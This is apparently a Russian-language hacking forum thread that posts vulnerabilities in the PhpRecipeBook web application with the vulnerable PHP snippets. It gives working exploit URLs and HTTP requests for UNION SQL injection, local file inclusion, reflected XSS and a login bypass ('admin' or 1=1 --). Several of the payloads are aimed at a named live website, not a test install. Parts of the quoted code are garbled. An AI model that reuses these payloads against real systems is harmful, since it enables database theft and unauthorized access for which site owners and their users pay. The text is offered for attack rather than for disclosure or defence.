Уязвимость : SQL

Файл modules\recipes\search.php

if ($_REQUEST) $query .= " recipe_course=" . $_REQUEST . " AND"; if ($_REQUEST) $query .= " recipe_base=" . $_REQUEST . " AND"; if ($_REQUEST) $query .= " recipe_ethnic=" . $_REQUEST . " AND"; if ($_REQUEST) $query .= " recipe_prep_time=" . $_REQUEST . " AND"; if ($_REQUEST) $query .= " recipe_difficulty=" . $_REQUEST . " AND";

Запрос там выше, искать времени нету

__http://www.bergiescookbook.com/cookbook/index.php?m=recipes&a=search&search=yes&base_id=-10+union+select+1,version(),3,4,5,6,7--

Уязвимость : LFI
Условия :MQ=off

Файл index.php

$m = isset( $_GET['m'] ) ? $_GET['m'] : 'recipes';
$a = isset( $_GET['a'] ) ? $_GET['a'] : 'index';
include "modules/$m/$a.php";


__http://www.bergiescookbook.com/cookbook/index.php?m=recipes'&a=search'&search=yes&base_id=10


Ушел спать, время многО, завтра добью

Уязвимоть : Blind -SQL

Файл : modules\recipes\view.php

$recipe_id = isset( $_GET['recipe_id'] ) ? $_GET['recipe_id'] : 0;
$show_ratings = isset ($_GET['show_ratings'] ) ? true : false;
$show_ratings = isset($_GET['show_ratings']) ? isset($_GET['show_ratings']) : $g_rb_show_ratings;

#Construct the Query and do most of the setup first, the print html
$sql = "SELECT $db_table_recipes.*,
ethnic_desc,
base_desc,
course_desc,
time_desc,
difficult_desc,
user_name
FROM $db_table_recipes
LEFT JOIN $db_table_ethnicity ON ethnic_id = recipe_ethnic
LEFT JOIN $db_table_bases ON base_id = recipe_base
LEFT JOIN $db_table_courses ON course_id = recipe_course
LEFT JOIN $db_table_prep_time ON time_id = recipe_prep_time
LEFT JOIN $db_table_difficulty ON difficult_id = recipe_difficulty
LEFT JOIN $db_table_users ON user_login = recipe_owner
WHERE recipe_id = $recipe_id";


Уязвимость : LFI

if (!empty( $_REQUEST['dosql'] )) {
include "modules/$m/".$_REQUEST['dosql'].".php";


__http://www.bergiescookbook.com/cookbook/index.php?dosql='

Уязвимость pXSS

<a href="<?php echo $PHP_SELF ?>?m=utils&a=converter&type=mass"><?php echo $LangUI->_('Mass');?></a> |
<a href="<?php echo $PHP_SELF ?>?m=utils&a=converter&type=volume"><?php echo $LangUI->_('Volume');?></a> |
<a href="<?php echo $PHP_SELF ?>?m=utils&a=converter&type=volume2mass"><?php echo $LangUI->_('Volume to mass');?></a> |
<a href="<?php echo $PHP_SELF ?>?m=utils&a=converter&type=mass2volume"><?php echo $LangUI->_('Mass to volume');?></a> |
<a href="<?php echo $PHP_SELF ?>?m=utils&a=converter&type=temperature"><?php echo $LangUI->_('Temperature');?></a>


Лично из за этого кода я и попер смареть xss я прав??

_http://www.bergiescookbook.com/cookbook/index.php?m=utils&a=converter&type=volume/%3E%3Cscript%3Ealert(/%C1%F3%EA%E8%ED%E0%F2%EE%F0/)%3C/script%3E

слив РОА

PhpRecipeBook 4.09

SQL injection

Уязвимый post - параметр:sm_login_id

Заисимости: mq = off

Вектор: union-query

Уязвимый код:


$sm_login_id= isset($_POST['sm_login_id'] ) ?$_POST['sm_login_id'] :'';

$sm_password= isset($_POST['sm_password'] ) ?$_POST['sm_password'] :'';

if ($sm_login_id!="") {

// try login if they are passing us a login ID

if (!$SMObj->login($sm_login_id,$sm_password)) {

$SMObj->addErrorMsg($SMObj->_('Login Failed! Please try again.'));

}

}

Функция login:


functionlogin($login='',$password='') {

if ($login==""&&$login=="") {

$login=$this->_autoLoginUser;

$password=$this->_autoLoginPasswd;

}

$sql="SELECT * FROM ".$this->_db_table_prefix.$this->_db_table_users.

" WHERE user_login = '$login' AND user_passwo rd = '".md5($password) ."'";

Exploit:



POST /phprecipebook/index.php HTTP/1.1
Host: 127.0.0.1
...
sm_login_id=
'union select concat_ws(0x3a,version(),database(),user()),2,3,4, 5,6,7,8,9,10+--+
&sm_password=antichat


passive XSS(reflected)

Уязвимый параметр:keywords

Заисимости: mq = off

Уязвимый код:


">[/COLOR]

Exploit:

[127.0.0.1/phprecipebook/index.php?m=recipes&a=search&keywords=">alert('Antichat')&search=yes]

YaBtr, lol на кой здесь union, судя по коду прокатит и

admin' or 1=1 --

YaBtr, lol на кой здесь union, судя по коду прокатит и
admin' or 1=1 --


Конечно, проглядел, вопросов нет!